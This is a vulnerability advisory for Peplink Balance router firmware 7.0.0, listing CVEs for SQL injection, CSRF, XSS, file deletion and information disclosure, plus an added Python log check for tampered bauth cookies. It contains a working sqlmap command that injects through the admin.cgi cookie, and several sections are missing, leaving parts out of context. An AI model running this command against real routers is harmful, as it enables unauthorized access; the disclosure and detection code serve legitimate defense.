Overview
--------
Confirmed Affected Versions: 7.0.0-build1904
Confirmed Patched Versions:
fw-b305hw2_380hw6_580hw2_710hw3_1350hw2_2500-7.0.1-build2093.bin
Vulnerable Firmware:
fw-b305hw2_380hw6_580hw2_710hw3_1350hw2_2500-7.0.0-build1904.bin
Models: Balance Routers 305, 380, 580, 710, 1350, 2500
Vendor: Peplink
Vendor URL: https://www.peplink.com/
Vector: Network
Credit: X41 D-Sec GmbH, Eric Sesterhenn
Additional Credits: Claus Overbeck (Abovo IT)
Status: Public
Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2017-005-peplink/
Product Description
-------------------
From the vendor webpage:
Use Load Balancing and SpeedFusion bandwidth bonding to deliver
superfast VoIP, video streaming, and data using an SD-WAN enabled
network. Even with a basic Balance 20 dual-WAN router, you can mix
different transport technologies and providers to keep your network up
when individual links go down. Switching between links is automatic and
seamless.
./sqlmap.py -u "https://ip/cgi-bin/MANGA/admin.cgi" \
  --cookie="bauth=csOWLxU4BvoMfhY2rHLVFm1EmZWV74zinla9IVclqrYxH16426647" \
  -p"bauth" --level 5 --risk 3 --dbms sqlite --technique=BEUSQ \
  --flush-session -t trace.log --prefix "'" --suffix "--" -a
Workarounds
-----------
Install vendor supplied update.
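Added example (not part of the X41 advisory or of Peplink code): a log check for tampering with the bauth cookie, the parameter targeted by the sqlmap command above. The log layout, the alphanumeric-only rule for bauth, the cookie name "other" and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Assumption: a legitimate bauth value is purely alphanumeric, like the
# sample cookie in the advisory's sqlmap command.
VALID_BAUTH = re.compile(r"[A-Za-z0-9]+")

# Assumed proxy log layout: src "METHOD path HTTP/x" status "Cookie header"
LINE = re.compile(r'^(?P<src>\S+) "(?P<method>\S+) (?P<path>\S+) [^"]*" '
                  r'(?P<status>\d{3}) "(?P<cookie>[^"]*)"$')

def bauth_values(cookie_header):
    """Yield every URL-decoded bauth value found in a Cookie header."""
    for part in cookie_header.split(";"):
        name, _, value = part.strip().partition("=")
        if name == "bauth":
            yield unquote(value)

def suspicious_requests(lines):
    """Return (src, path, value) for bauth cookies that are not alphanumeric."""
    hits = []
    for line in lines:
        m = LINE.match(line.strip())
        if not m or "/cgi-bin/MANGA/" not in m["path"]:
            continue
        for value in bauth_values(m["cookie"]):
            if not VALID_BAUTH.fullmatch(value):
                hits.append((m["src"], m["path"], value))
    return hits

def repeat_sources(hits, threshold=2):
    """Sources that sent at least `threshold` malformed bauth cookies."""
    counts = Counter(src for src, _, _ in hits)
    return sorted(src for src, n in counts.items() if n >= threshold)

# Constructed sample lines (addresses and cookie values are made up).
SAMPLE = [
    '198.51.100.7 "GET /cgi-bin/MANGA/admin.cgi HTTP/1.1" 200 "bauth=Ab3dEf9hIjK2"',
    '203.0.113.9 "GET /cgi-bin/MANGA/admin.cgi HTTP/1.1" 200 "bauth=Ab3d%27--"',
    '203.0.113.9 "POST /cgi-bin/MANGA/admin.cgi HTTP/1.1" 200 "other=1; bauth=zz%27%20--"',
    '192.0.2.4 "GET /index.html HTTP/1.1" 200 "bauth=x%27"',
    '192.0.2.5 "GET /cgi-bin/MANGA/admin.cgi HTTP/1.1" 200 "other=1"',
]

if __name__ == "__main__":
    hits = suspicious_requests(SAMPLE)
    for src, path, value in hits:
        print(f"{src} {path} bauth={value!r}")
    print("repeat sources:", repeat_sources(hits))
```

Cookie headers are rarely logged by default, so this only applies where a reverse proxy or capture in front of the management interface records them.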
No CSRF Protection
==================
Severity Rating: Medium
Vector: Network
CVE: CVE-2017-8836
CWE: 352
CVSS Score: 5.4
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
Workarounds
-----------
Install vendor supplied update.
This executes the JavaScript in the victim's browser, which can be abused
to steal session cookies.
Workarounds
-----------
Install vendor supplied update.
File Deletion
=============
Severity Rating: Medium
Vector: Network
CVE: CVE-2017-8841
CWE: 73
CVSS Score: 6.5
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H
Workarounds
-----------
Install vendor supplied update.
Information Disclosure
======================
Severity Rating: Medium
Vector: Network
CVE: CVE-2017-8840
CWE: 200
CVSS Score: 5.3
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
-----8<------------------------------------------------
Master LAN Address = [ <internal ip> / <netmask> ]
Serial Number = [ <serial number> ]
HA Group ID = [ <group id> ]
Virtual IP = [ <internal ip> / <netmask> ]
Submitted syncid = [ <syncid> ]
-----8<------------------------------------------------
This information can be valuable for an attacker to exploit other issues.
Workarounds
-----------
Install vendor supplied update.
Timeline
--------
2017-04-07 Issue found
2017-04-10 Vendor asked for security contact
2017-04-11 Vendor replied, sent GPG key
2017-04-11 Information supplied to vendor
2017-04-11 Vendor acknowledges that the information is received
2017-04-17 Vendor acknowledges SQL injection
2017-05-08 CVE IDs for all issues requested
2017-05-08 CVE IDs assigned
2017-05-11 Vendor informed about CVE IDs
2017-05-29 Version provided to X41 for testing
2017-05-31 First test results sent back to the vendor
2017-06-01 Remaining test results sent back to the vendor
2017-06-05 Coordinated Firmware and Advisory release